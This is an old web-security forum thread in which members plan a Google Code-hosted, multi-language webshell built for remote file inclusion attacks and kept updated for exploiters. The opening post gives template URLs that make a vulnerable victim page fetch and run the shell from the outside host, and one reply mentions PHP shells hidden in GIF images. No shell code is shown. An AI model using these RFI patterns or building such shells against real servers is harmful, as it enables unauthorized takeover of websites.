Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: sirdarckcat
Date: July 05, 2007 01:24AM

Hi!

Well, there are lot's of webshells very well known (C99, RST, etc..), but in all cases, you need to upload the webshell to a server, and depend that it's still active.

I am proposing to make a project in Google Code Hosting, that includes a "multiple languag" WebShell, and some other tools.

If the webshell is released under the terms of Google Code Hosting, and it's a project, for making a shell interface, they dont have any legal reasons to close it.

The difference between this, and other webshells, must be:
- This webshell is going to be available for use and exploit from a constant website, that wont have issued of bandwidth.
- This webshell is going to be updated to the latest php vulnerabilties, so, the exploiter can be sure that it is the best webshell "today".

the code is always available through:

http:// <PROJECT-NAME> .googlecode.com/svn/trunk/ <FILE-NAME>

for example:
http://mzk.googlecode.com/svn/trunk/mzk.php (this is not a webshell)

so you could do:
http:// victim.com /vulnerable.php?rfi=http:// <PROJECT-NAME> .googlecode.com/svn/trunk/ <FILE-NAME>.php
http:// victim.com /vulnerable.asp?rfi=http:// <PROJECT-NAME> .googlecode.com/svn/trunk/ <FILE-NAME>.asp
http:// victim.com /vulnerable.jsp?rfi=http:// <PROJECT-NAME> .googlecode.com/svn/trunk/ <FILE-NAME>.jsp

what do you think? this has future?

who is interested in participating?

:)

Greetz!!



Edited 1 time(s). Last edit at 07/05/2007 10:19AM by sirdarckcat.

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: backbone
Date: July 05, 2007 06:05AM

I'm into it ;)

and yeah I find it interesting... is in a way slicker than the current web shells...
but A question i do have... Will it be just php webshell or will you include in the project also asp, jsp, etc webshells?

---
blog [-] microblog



Edited 1 time(s). Last edit at 07/05/2007 06:07AM by backbone.

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: sirdarckcat
Date: July 05, 2007 10:23AM

Hi!

I think it should also have a simple SQL administrator, for mysql, mssql, pgsql..

Also, I didn't thought about integrating other langs (asp, jsp, cgi), but I think it's a great idea.. PHP is more common, but RFI is not exclusively of PHP.. Any way, I don't control ASP, nor JSP, we will need members that do know.

I've edited the post, so it includes asp and jsp.

Which name do you think this project should have?

Greetz!!

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: ma1
Date: July 05, 2007 10:53AM

Hi sirdarckcat,
I'm quite fluent in PHP, Ruby, Java and .NET languages, so if you blueprint requisites in PHP I can easily port them.
As a project name, what about "Shelley", like Frankenstein's mom?
After all, you're going to assemble various pieces to build a scary monster, aren't you? ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: sirdarckcat
Date: July 05, 2007 11:10AM

Hi again mal!

The name you propose is really cool, and fits exactly to the purpose of the project.

I've added you both to my google talk contact list.

I think we have enough to start the project, any way, I'll wait 'till midnight to start the project, to allow others to join :).

Greetz!!

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: Martin
Date: July 05, 2007 12:27PM

Twas a dark and dreary night in November....

(the opening of Frankenstein for those who don't know!)

Will be interesting to see what you guys come up with - ma1 - you mentioned .NET - don't really see how .NET is vulnerable to remote file inclusion unless you do something *exceptionally* stupid which would involve using Reflection to compile the input at run-time...

Classic asp on the other hand is a different matter :)

Good luck guys - look forward to seeing your work!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: Anonymous User
Date: July 05, 2007 03:01PM

Sounds pretty interesting - count me in.

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: tx
Date: July 05, 2007 06:15PM

I'd like to get in on this as well. I've been working recently with making small phpshells embedded in gifs... seems copacetic

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: sirdarckcat
Date: July 06, 2007 12:16AM

I'm glad to have you aboard, pleas PM me you mail addresses :)

Does everybody agree with the name? shelley
http://code.google.com/p/shelley/

Greetz!!



Edited 2 time(s). Last edit at 07/06/2007 12:43AM by sirdarckcat.

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: thornmaker
Date: July 06, 2007 01:19AM

count me in

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: Martin
Date: July 06, 2007 01:53AM

I agree with the name as long as Frankenstein quotes can appear throughout the comments haha!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: Remote File Inclusion Open Source WebShell using Google Code Project Hosting
Posted by: Ivan
Date: July 06, 2007 12:39PM

Cool, I like this project, many times I was looking for something like that.

I'm very good in C and PHP (and familiar with asm, C#, VB, JS, mysql, ...), if You accept new members than count on me ...

http://www.security-net.biz/



Edited 2 time(s). Last edit at 07/06/2007 12:40PM by Ivan.

Options: ReplyQuote


Sorry, only registered users may post in this forum.